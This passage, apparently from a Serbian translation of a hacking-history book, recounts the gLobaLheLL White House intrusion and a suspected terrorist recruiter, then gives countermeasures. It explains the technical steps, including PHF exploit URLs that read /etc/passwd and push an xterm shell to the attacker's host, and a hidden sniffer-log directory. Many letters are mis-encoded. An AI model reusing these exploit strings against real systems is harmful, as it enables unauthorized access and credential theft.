od otprilike deset najsigurnijih Web prezentacija u zemài. Bili su “pri-liåno zauzeti upadaçem svuda”, objasnio je ne0h, “da bi svetu dokazalida smo najboài”. Umesto opãteg virtuelnog tapãaça po ramenu, onkaæe da se atmosfera moæe boàe opisati kao: “Dobro obavàen posao,momci, najzad smo uspeli, ãta je sledeñe?”
Ali nije im ostalo mnogo vremena za bilo kakve druge upade. Njiho-vi svetovi su se ubrzo sruãili, a taj deo priåe nas ponovo vraña na miste-rioznog Kalida.
Zyklon, inaåe poznat kao Erik Barns, odavde preuzima priåu. Kaæeda nikada zaista nije bio ålan grupe gLobaLheLL, ali je visio po IRCprezentacijama s nekim çenim ålanovima. Kako on opisuje dogaœaje,upad u prezentaciju Bele kuñe postao je moguñ kada je otkrio da je onamogla biti ugroæena koriãñeçem rupe u programu PHF za pristup tele-fonskom imeniku postavàenom na Web. To je bila najbitnija slabost ali,mada su u hakerskoj zajednici znali za çu, “nije je koristilo mnogo àu-di”, kaæe Zyklon.
Izvodeñi viãe koraka (detaàno su objaãçeni u odeàku Saæetak, kasni-je u ovom poglavàu), mogao je da zauzme osnovni direktorijum lokaci-je whitehouse.gov i obezbedi pristup drugim sistemima na lokalnojmreæi, ukàuåujuñi server za e-poãtu Bele kuñe. Zyklon je u tom trenut-ku mogao da presretne poruke izmeœu osobàa Bele kuñe i javnosti,mada te poruke, naravno, ne bi otkrile nikakve poveràive informacije.
Meœutim, Zyklon je rekao da je mogao i da “doœe do kopije lozinkei skrivenih datoteka”. Vrãàali su po prezentaciji, gledali ãta mogu dapronaœu i åekali da àudi poånu da dolaze na posao. Dok je åekao, do-bio je poruku od Kalida koji mu je rekao da piãe ålanak o nedavnimupadima i pitao Zyklona da li je nedavno imao akcije o kojima bi govo-rio. “I onda sam mu rekao da smo upravo upali na Web prezentacijuBele kuñe”, ispriåao je Zyklon.
Zyklon mi je rekao da je u roku od par sati çihov program zaprañeçe protoka podataka primeñen – administrator sistema je poku-ãavao da otkrije ãta se deãava i uœe u trag àudima koji su bili na prezen-taciji. Puka sluåajnost? Ili je baã tad imao neki razlog da postanesumçiåav? Proãli su meseci pre nego ãto je Zyklon pronaãao odgovor.Ali tada, åim je prisluãkivaå otkriven, momci su se povukli s prezentaci-je i nadali se da su pretekli administratora.
43
Poglavlje 2
: Kad
teroristi p
ozo
vu
Meœutim, åaånuli su u osiçe gnezdo. Oko dve nedeàe kasnije, FBIse ustremio na sve ålanove grupe gLobaLheLL koje su mogli da identi-fikuju. Pored Zyklona – tada je imao 19 godina i uhapãen je u dræaviVaãington – uhapãeni su i MostHateD (Patrik Gregori, takoœe 19 godi-na, iz Teksasa), MidPhasr (Åad Dejvis iz Viskonsina), i drugi.
ne0h je bio meœu par hakera koji su preæiveli napad. Sa bezbedneudaàene lokacije on je, razjaren, postavio stranu na Web prezentaciju saprkosnom porukom. Ona je u prvom trenutku glasila: “Sluãajte vi ga-dovi iz FBI. Ne z_ se s naãim ålanovima jer ñete izgubiti. Dok ovo pi-ãem mi dræimo fbi.gov. UPLAÃILI STE SE. Uhapãeni smo jer vaãiglupi idioti ne mogu da ukapiraju ko je upo u belu kuñu... jel tako? paste nas sve uñorkirali da vidite jel ñe neko da ga otkuca. PUNO J_SREÑE. MI NISMO CINKAROÃI. Kapirate? REKAO SAM DOMI-NACIJA SVETOM.”
I potpisao je: “Nemilosrdni ne0h.”
9
Posledice
Kako se desilo da je administrator sistema tako rano ujutro poåeo daçuãka? Zyklon se nimalo ne dvoumi oko odgovora. Kada su tuæiocisakupili dokumente za ovaj sluåaj, pronaãao je izjavu da su informacijekoje su vodile do saznaça vezanih za upad grupe gLobaLheLL u pre-zentaciju Bele kuñe, dobijene od douãnika FBI-ja. Koliko se on seña, udokumentu je pisalo i da se taj douãnik nalazio u Nju Delhiju, u Indiji.
Po Zyklonovom miãàeçu, nije bilo nikakve sumçe. Jedina osobakojoj je rekao za upad u Belu kuñu –
jedina osoba – bio je Kalid Ibra-him. Jedan plus jedan jesu dva: Kalid je bio douãnik FBI.
Ali misterija ostaje. Åak i ako je Zyklon u pravu, da li je to celapriåa? Kalid je bio douãnik, pomagao je FBI-ju da pronaœe klince hake-re koji su bili raspoloæeni da upadaju na osetàive prezentacije? Ili moædapostoji joã jedno moguñe objaãçeçe: da je çegova uloga douãnika bilasamo pola priåe, a da je on zapravo bio i pakistanski terorista, kao ãto jemislio indijski general. Åovek koji igra dvostruku ulogu: pomaæe inte-resima Talibana dok je infiltriran u FBI.
Njegov strah da ñe ga neki klinac prijaviti FBI-ju uklapa se u ovuverziju priåe.
44
Um
eñe
pro
vale
Samo nekoliko àudi zna istinu. Pitaçe je da li su meœu çima iagenti FBI i federalni tuæioci koji su ukàuåeni u sluåaj. Ili su i oni nasa-mareni?
Na kraju, Patrik Gregori i Åad Dejvis osuœeni su na dvadeset ãestmeseci, a Zyklon Barns na petnaest. Sva trojica su odsluæila kazne i viãenisu u zatvoru.
Pet godina kasnijeDani hakerisaça su za Comradea uglavnom samo señaçe, ali çegovglas æivne kada govori o “uzbuœeçu zbog sr_ koja ne biste smeli da pra-vite, odlaska na mesta na kojima ne biste smeli da budete, nadajuñi seda ñete naiñi na neãto kul”.
Ipak, vreme je da se poåne sa æivotom. On kaæe da razmiãàa o fakul-tetu. Kada smo razgovarali, upravo se vratio iz skautske ãkole u Izraelu.Jezik mu nije bio prevelik problem – uåio je hebrejski u osnovnoj ãkolii iznenadio se koliko je mnogo zapamtio.
Njegovi utisci o toj zemài su pomeãani. Devojke su bile “baã super”,a Izraelci su pokazali da veoma vole Ameriku. “Åini se da se ugledaju naAmerikance.” Na primer, provodio je vreme s nekim Izraelcima koji supili sok RC Cola za koji nikada nije åuo, a ispostavilo se da se pravi uAmerici. Izraelci su objasnili: “To je ono ãto Amerikanci piju u re-klamama”. Nailazio je i na “antiameriåke stavove àudi koji se ne slaæu saameriåkom politikom”, ali to ga nije omelo: “Pretpostavàam da togaima svuda.”
Vreme mu se nimalo nije dopalo – bilo je “hladno i kiãovito” dok jebio tamo. A onda, bio je tu i problem s raåunarima. Zbog puta je kupioprenosivi raåunar i beæiånu mreænu karticu, ali je otkrio da su “zgradenapravàene od ogromnog kameça”. Njegov raåunar je mogao da vidipet ili deset mreæa, ali su signali bili previãe slabi za povezivaçe i moraoje da peãaåi dvadeset minuta da bi doãao do mesta na kom se moæe pri-javiti na mreæu.
Comrade je sada u Majamiju. Tinejdæer s dosijeom prestupnika sadaæivi od nasledstva i pokuãava da odluåi da li ñe iñi na fakultet. Ima dva-deset godina i uglavnom ne radi niãta.
Comradeov drugar ne0h radi za veliku telekomunikacionu kompa-niju (kaæe da posao s radnim vremenom od devet do pet “nije dobar”),ali ñe uskoro otiñi u Los Anœeles na tri meseca fiziåkog rada jer plañaju
45
Poglavlje 2
: Kad
teroristi p
ozo
vu
mnogo viãe nego ãto sada zaraœuje. Nada se da ñe, kao i veñina obiånihàudi, uspeti da uãtedi dovoàno za otplañivaçe kuñe u kojoj trenutno æivi.
Kada se tromeseåni, dobro plañen posao zavrãi, i ne0h razmiãàa ostudiraçu – ali ne planira da studira raåunarske nauke. “Veñina àudi stakvim diplomama koje sam sreo nema pojma”, rekao je. Umesto toga,on bi voleo da studira poslovni i organizacioni menadæment, a onda dase raåunarima bavi na poslovnom nivou.
Govoreñi o svojim ranijim avanturama, on ponovo pomiçe svojuokupiranost Kevinom. Do koje mere je zamiãàao da ide mojim stopama?
Da li sam æeleo da budem uhvañen? I jesam i nisam. Ako meuhvate, to bi bio dokaz da “mogu to da uradim i da sam touradio”. Nije baã da sam namerno hteo da me uhvate. Hteosam da me uhvate da bih se borio, oslobodio i onda bio hakerkoji je umakao. Izaãao bih, naãao dobar posao u nekoj vladi-noj agenciji i uklopio bih se s podzemàem.
Koliko je pretça velikaKombinacija odluånih terorista i neustraãivih klinaca hakera mogla bibiti katastrofalna za Ameriku. Ova priåa me je naterala da se zapitamkoliko drugih Kalida regrutuje klince (ili nepatriotski nastrojene odra-sle sa hakerskim sposobnostima), gladne novca, priznaça ili zadovoà-stva za uspeãno obavàene teãke zadatke. Vrbovnici posle Kalida moædañe biti tajanstveniji i neñe se moñi tako lako otkriti.
Kada sam bio u pritvoru pre suœeça, nekoliko puta mi je prilaziokolumbijski kraà droge. Sledovala mu je doæivotna robija u federalnomzatvoru bez moguñnosti uslovne kazne. Ponudio mi je primamàiv po-sao: platiñe mi 5 miliona dolara u gotovom za upad u “Sentry” – raåu-narski sistem Federalnog biroa za zatvore – i çegovo oslobaœaçe izzatvora. Taj tip je bio stvaran i smrtno ozbiàan. Nisam prihvatio çego-vu ponudu, ali sam ostavio utisak da ñu mu pomoñi kako bih izbegaosukob. Pitam se ãta bi ne0h uradio u sliånoj situaciji.
Ameriåki neprijateài moæda treniraju svoje vojnike za kompjuterskoratovaçe kojim bi napali ameriåku infrastrukturu i odbranili svoju. Nemorate biti mudrac da biste shvatili da takve grupe mogu angaæovatiumeãne hakere iz bilo kog dela sveta radi obuke, ili za projekte koji subitni za misije.
46
Um
eñe
pro
vale
Godine 1997. i ponovo 2003, Ministarstvo odbrane je pokrenulooperaciju Eligible Receiver – pokuãaj da se proveri osetàivost nacije naelektronski napad. U ålanku Washington Timesa10 o ranijem ovakvompokuãaju, objavàeno je: “Viãi rukovodioci Pentagona bili su zapaçenivojnom veæbom koja je pokazala koliko je hakerima lako da obogaàeameriåke vojne i civilne raåunarske mreæe”. Ålanak objaãçava da jeAgencija za nacionalnu bezbednost okupila grupu svojih specijalista zaraåunare u “crveni tim” hakera i omoguñila im da koriste samo raåu-narsku opremu koja je dostupna i javnosti, i sve alate za hakerisaçe,ukàuåujuñi kôd za zloupotrebe koji su mogli preuzeti sa Interneta ilielektronskih oglasnih tabli.
Za nekoliko dana, hakeri iz crvenog tima infiltrirali su se u raåunar-ske sisteme za upravàaçe delovima nacionalne elektrodistribucijskemreæe i pomoñu nekoliko komandi mogli su da zamraåe åitave delovezemàe. “Da ovo nije bila veæba”, objavio je Christian Science Monitor,“oni su mogli da poremete sistem komunikacije Ministarstva odbrane (ipreuzmu najveñi deo Pacifiåke komande) i pristupe raåunarskim si-stemima na brodovima ameriåke mornarice.”11
Liåno sam mogao da pobedim bezbednosne mehanizme telefonskihcentrala napravàenim u kompaniji Baby Bells i kontroliãem pristup timcentralama. Pre deset godina imao sam potpunu kontrolu nad veñinomcentrala koje su odræavale kompanije Pacific Bell, Sprint, GTE i druge.Zamislite haos koji bi snalaæàiva grupa terorista mogla da napravi kadabi imala takav pristup.
Ålanovi organizacije Al Kaida i drugih teroristiåkih grupa i ranije sukoristile raåunarske mreæe pri planiraçu teroristiåkih napada. Postojedokazi da su teroristi koristili Internet prilikom planiraça operacija zanapade 11. septembra.
Ako je Kalid Ibrahim i bio uspeãan u dobijaçu informacija prekopomenutih hakera, to niko ne obelodaçuje. Nedostaje konaåan dokazda je on zaista bio povezan s napadima na Svetski trgovinski centar iPentagon. Ipak, niko ne zna da li ñe se on ili neko sliåan ponovo pojavi-ti na kibernetiåkoj sceni, traæeñi naivne pomagaåe koje uzbuœuje “pra-vàeçe sr_ koja ne biste smeli da pravite, odlazak na mesta na kojima nebiste smeli da budete”. Klince koji bi mogli pomisliti da je ponuœeniizazov “kul”.
47
Poglavlje 2
: Kad
teroristi p
ozo
vu
Za mlade hakere, slaba bezbednost ostaje neprekidan podsticaj. Paipak, hakeri iz ove priåe trebalo je da prepoznaju opasnost kada ih jestrani dræavàanin regrutovao za kompromitovaçe osetàivih ameriåkihraåunarskih mreæa. Moram se zapitati koliko ñe drugih mladiña kao ãtoje ne0h neprijateà regrutovati.
U svetu punom terorista, dobra bezbednost nikada nije bila tolikobitna kao danas.
SAÆETAKne0h nam je dao detaàe o naåinu na koji je upao u raåunarski sistemLockheed Martina. Priåa je svedoåanstvo o inovativnosti hakera (“Akou bezbednosti postoji rupa, mi ñemo je pronañi” mogao bi biti hakerskimoto), ali i upozoreçe za svaku organizaciju.
ne0h je brzo utvrdio da Lockheed Martin ima sopstveni server zaprevoœeçe imena domena (engl. Domain Name Servers, DNS). DNSje Internet protokol koji, na primer, www.disney.com prevodi u198.187.189.55, adresu koja se moæe koristiti za usmeravaçe paketa sporukama. ne0h je znao da je grupa za istraæivaçe bezbednosti u Poà-skoj objavila ono ãto hakeri nazivaju “exploit” – program koji je dizajni-ran tako da napadne jedan konkretan raçiv deo – da iskoristi slabost uverziji DNS-a kompanije Lockheed.
Kompanija je koristila DNS protokol pod imenom BIND (BerkeleyInternet Name Domain). Poàska grupa je otkrila da je jedna verzijaBIND-a slaba kada napad ukàuåuje “prelivaçe udaàenog bafera” (engl.remote buffer overflow), a upravo tu verziju imala je kompanija Lock-heed Martin. Prateñi metodu koju je pronaãao na Internetu, ne0h jemogao da doœe do administratorskih privilegija i na primarnom i na se-kundarnom DNS serveru Lockheeda.
Posle zauzimaça administratorskog naloga, ne0h je podesio presre-taçe lozinki i e-poãte instalirajuñi program za çuãkaçe. U tajnosti jehvatao sav saobrañaj. Podatke koje treba uskladiãtiti, haker obiåno ãaàena mesto gde je mala verovatnoña da ñe biti primeñeni. Da bi sakriodnevnik prisluãkivaça, ne0h je napravio direktorijum sa imenom kojeje bilo samo razmak, predstavàen s tri taåke. Prava putaça koja je ko-riãñena bila je “/var/adm/ ...” Tokom inspekcije administrator sistemamogao je lako da previdi ovu bezopasnu stavku.
48
Um
eñe
pro
vale
Tehnika sakrivaça programa za çuãkaçe, mada je u mnogim situ-acijama efikasna, priliåno je jednostavna. Za prikrivaçe hakerskih tra-gova u ovakvim situacijama postoje i prefiçenije metode.
Pre nego ãto je otkrio da li ñe moñi dubàe da prodre u mreæu Lock-heed Martina kako bi doãao do poveràivih informacija, ne0h je obratiopaæçu na drugi zadatak, pa su osetàive datoteke kompanije ostale bez-bedne.
Za upad u Belu kuñu, Zyklon kaæe da je prvo pokrenuo programCGI Scanner koji pregleda ciàni sistem traæeñi slabosti standardnog in-terfejsa za prenos. Otkrio je da je Web prezentacija podloæna napadupomoñu “zloupotrebe PHF-a”. Ona koristi greãku koju je napravio pro-gramer PHF skripta (telefonskog imenika).
PHF je okruæeçe zasnovano na obrascima. Ono prihvata ime kaounos i na serveru traæi podatke o imenu i adresi. Skript poziva funkcijuescape_shell_cmd(), koja bi trebalo da oåisti unos od sumçivih znako-va. Ali, programer je sa liste izostavio jedan znak – znak za novi red. Vr-stan napadaå mogao bi iskoristiti taj previd tako ãto ñe unos postaviti uobrazac koji sadræi ãifrovanu verziju (0x0a) znaka za novi red. Slaçeznakovnog niza sa ovim znakom prevariñe skript tako da izvrãi svakukomandu koju napadaå odabere.
Zyklon je u svoj åitaå Weba uneo URL
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Tako je mogao da prikaæe datoteku s lozinkama za whitehouse.gov.Meœutim, on je hteo potpunu kontrolu nad Web serverom Bele kuñe.Gotovo sigurno je znao da ñe ulazi X Servera biti blokirani zaãtitnombarijerom, te da neñe moñi da se poveæe ni sa jednim od tih servisa naprezentaciji whitehouse.gov. Zato je ponovo iskoristio rupu u PHF-utako ãto je uneo:
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20zyklons.ip.address:0.0
Tako je terminalski emulator xterm poslat sa servera Bele kuñe naraåunar koji je on kontrolisao i na kom je radio X server. Drugim reåi-ma, umesto da se poveæe sa whitehouse.gov, on je sistemu Bele kuñe na-redio da se poveæe sa çim. (To je moguñe samo kada barijera dozvoàavaizlazne veze, ãto je ovde oåigledno bio sluåaj.)
49
Poglavlje 2
: Kad
teroristi p
ozo
vu
Potom je iskoristio slabost prelivaça bafera u programu sistema –ufsrestore. Zyklon kaæe da mu je to omoguñilo da zadobije administra-torska prava na prezentaciji whitehouse.gov, i pristup serveru za poãtuBele kuñe i ostalim sistemima na mreæi.
PROTIVMEREOpisane zloupotrebe koje su pravili ne0h i Comrade pred sve kompani-je postavàaju dva problema.
Prvi je jednostavan i opãte poznat: informisaçe o svim najnovijimizdaçima operativnog sistema i programa. Izuzetno je vaæno biti u tokui instalirati bezbednosne zakrpe ili ispravke. Da biste bili sigurni da seto ne radi nasumice, trebalo bi da osmislite i sprovodite program aæuri-raça åiji bi cià bio upozoravaçe odgovarajuñeg osobàa åim se pojavinova dopuna proizvoda koje kompanija koristi – naroåito operativnogsistema, ali i aplikacionog softvera i firmvera.
Kada nova zakrpa postane dostupna, ona se mora ãto pre instalirati– odmah, ili åim bude moguñe. Nije teãko razumeti premorene zaposle-ne koji su pod stalnim pritiskom obavàaça obiånih zadataka (instalira-çe sistema za nove radnike, na primer) i instaliraça zakrpa u doglednovreme. Meœutim, ukoliko je ureœaj s nepotpunim softverom dostupanpreko Interneta, nastaje veoma riziåna situacija.
Brojni sistemi su ugroæeni zbog neredovnog aæuriraça. Åim se nekaslabost objavi, prozor izloæenosti je maksimalno otvoren sve dok proiz-voœaå ne objavi zakrpu koja ñe popraviti problem, i dok je korisnici neinstaliraju.
Vaãa organizacija treba tom zadatku da dâ visok prioritet. Morapostojati zvaniåan program upravàaça zakrpama koji smaçuje izlo-æenost ãto je moguñe bræe, ali tako da se ne ometaju osnovne operacijeposlovaça.
Ipak, åak i ako redovno instalirate zakrpe, to nije dovoàno. ne0hkaæe da su neki upadi u kojima je uåestvovao bili zloupotrebe “nultogdana” (engl. zero day) – upadi zasnovani na slabosti koja je poznatasamo u okviru male grupe hakera. “Nulti dan” je dan kada prvi put is-koriste tu slabost, a to je ujedno i dan kada proizvoœaå i àudi koji sebave bezbednoãñu saznaju za çu.
50
Um
eñe
pro
vale
Poãto uvek postoji moguñnost takvih upada, svaka organizacija kojakoristi loã proizvod raçiva je sve dok se ne objavi zakrpa ili zaobilaznoreãeçe. Kako da smaçite rizik od takve izloæenosti?
Verujemo da je jedino vredno reãeçe koriãñeçe modela “dubinskeodbrane”. Moramo pretpostaviti da ñe naãi raåunarski sistemi koji sudostupni javnosti u nekom trenutku biti raçivi na nulti dan. Zbog togatreba da stvorimo okruæeçe za smaçivaçe potencijalne ãtete koju loãimomci mogu da naprave. Jedan primer, koji smo ranije pomenuli, jestepostavàaçe javno dostupnih sistema u “DMZ” zaãtitne barijere kom-panije. Termin DMZ je pozajmàen iz vojnopolitiåke skrañenice za “de-militarizovanu zonu” i odnosi se na podeãavaçe arhitekture mreæe takoda sistemi koji su dostupni javnosti (Web serveri, serveri e-poãte, DNSserveri i sliåno) budu izolovani od osetàivih sistema u mreæi kompanije.Primeçivaçe arhitekture koja ãtiti unutraãçu mreæu jedan je primer“dubinske odbrane”.
Takvim rasporedom, åak i ako hakeri otkriju dotad nepoznatu slabosti dospeju do Web servera ili servera e-poãte, korporativni sistemi u unu-traãçoj mreæi i daàe ñe biti zaãtiñeni dodatnim bezbednosnim slojem.
Kompanije mogu organizovati joã jednu efikasnu protivmeruprañeçem mreæe ili pojedinaånih matiånih raåunara u potrazi za neuo-biåajenim ili sumçivim aktivnostima. Napadaå obiåno izvodi odreœeneakcije kada uspeãno upadne u sistem – na primer, pokuãava da doœe doãifrovanih ili obiånih tekstualnih lozinki, instalira zadça vrata, meçakonfiguraciju datoteka kako bi oslabio bezbednost, ili meça sistemske,programske ili dnevniåke datoteke.
Prañeçem tih vrsta uobiåajenog hakerskog ponaãaça i uzbuçi-vaçem odgovarajuñeg osobàa, lakãe ñete kontrolisati ãtetu.
Drugo: nebrojeno puta su me novinari pitali koji je najboài naåinzaãtite poslovnog ili liånog raåunara u danaãçem neprijateàskomokruæeçu. Jedna od osnovnih preporuka jeste koriãñeçe jaåeg vidaidentifikovaça umesto statiånih lozinki. Nikada neñete znati, osimmoæda kada sve bude gotovo, da li neko drugi zna koja je vaãa lozinka.
Uz tradicionalne lozinke moæete koristiti brojne tehnike prijavài-vaça na drugom nivou, koje omoguñavaju mnogo veñu sigurnost. Po-red ranije pomenutog RSA SecureID-a, Safeword PremierAccess nudiæetone za generisaçe lozinke, digitalne sertifikate, smart kartice, bio-metriku i druge tehnologije.
51
Poglavlje 2
: Kad
teroristi p
ozo
vu
Nedostaci ove vrste kontrolisaça identiteta jesu dodatni troãkovi ineprijatnosti za svakog korisnika. Sve zavisi od toga ãta pokuãavate dazaãtitite. Statiåne lozinke su moæda dovoàne za zaãtitu novih ålanakaWeb prezentacije LA Timesa. Ali, da li se na çih moæete osloniti kadatreba da zaãtitite specifikacije dizajna novog putniåkog mlaznog aviona?
ZAKLJUÅAKPriåe u ovoj kçizi ali i novinski ålanci, prikazuju koliko su ameriåkiraåunarski sistemi, a i sama nacija, podloæni napadu. Åini se da je ve-oma malo sistema zaista bezbedno.
U eri terorizma, jasno je da se rupe moraju boàe krpiti. Epizode kaoãto je ova, pokreñu pitaçe s kojim se moramo suoåiti: koliko lako se ta-lenat i znaje nesavesnih tinejdæera mogu okrenuti protiv nas i ugrozitiameriåko druãtvo. Verujem da se joã u osnovnoj ãkoli – åim se œaci su-sretnu sa informatikom – mora uåiti o principima raåunarske etike.
Nedavno sam prisustvovao prezentaciji Frenka Abignejla, protagoni-ste filma Uhvati me ako moæeã (Catch Me If You Can). Frenk je sproveoistraæivaçe o etiåkoj upotrebi raåunara meœu uåenicima sredçih ãkolaãirom zemàe. Svaki uåenik je bio upitan da li je provaàivaçe lozinkeãkolskog druga prihvatàivo ponaãaçe. Iznenaœuje da åak åetrdeset osamprocenata ispitanih studenata smatra da je to u redu. S takvim stavovimanije teãko shvatiti zaãto àudi uåestvuju u ovakvim aktivnostima.
Ukoliko neko ima predlog kako da mladi hakeri budu maçe pod-loæni regrutovaçu od strane neprijateàa, domañih i stranih, bilo bi do-bro da nam saopãti svoje ideje.
NAPOMENE1. “Do Terrorists Troll the Net?”, Niall McKay, wired.com, 14. novembar, 1998.
2. Makajev ålanak, op. cit.
3. Makajev ålanak, op. cit.
4. Sa Web prezentacije satp.org, South Asia Intelligence Review.
5. “The United States and the Global Coalition Against Terrorism, September-December 2001: A Chronology”, http://www.state.gov/r/pa/ho/pubs/fs/5889.htm.
6. Obrañaçe general-majora Yashwanta Devaa, Avsm (Retd), President lete,na temu “Information Security” u Indijskom meœunarodnom centru (India In-ternational Centre), Nju Delhi, 6. april 2002, strana 9.
52
Um
eñe
pro
vale
7. Ovo je teãko potvrditi. Poãto se napad dogodio za vreme Klintonove admi-nistracije, nijedna od navedenih osoba viãe ne radi u Beloj kuñi. Ali dostupnoje nekoliko sitnica. Monti Hejms je pravio video-snimak. Kristofer Adams jeime reportera britanskog åasopisa Financial Times; koliko nam je poznato, uBeloj kuñi nije bilo zaposlenog s tim imenom. Debra Rid je fotograf AssociatedPressa. Nismo pronaãli nikoga sa imenom Koni Kolabatisto ko je radio u Belojkuñi. Æena s tim imenom udata je (ili je bila u to vreme) za Dæina Kolabatista,koji je bio predsednik odeàeça Solutions u kompaniji Space Imaging, alinema oåigledne veze izmeœu çih i tima u Beloj kuñi.
8. http://www.attrition.org/mirror/attrition/1999/05/10/www.white-house.gov/mirror.html.
9. I ovde je teãko proveriti verodostojnost. Ipak, tekst koji je naveden moæese videti na lokaciji http://www.attrition.org/mirror/attrition/1999/05/26/mmic.snu.ac.kr/.
10. “Computer Hackers Could Disable Military; System Compromised in Se-cret Exercise”, Bil Gerc, Washington Times, 16. april, 1998.
11. “Wars of the Future... Today”, Tom Regan, Christian Science Monitor, 24.jun, 1999.
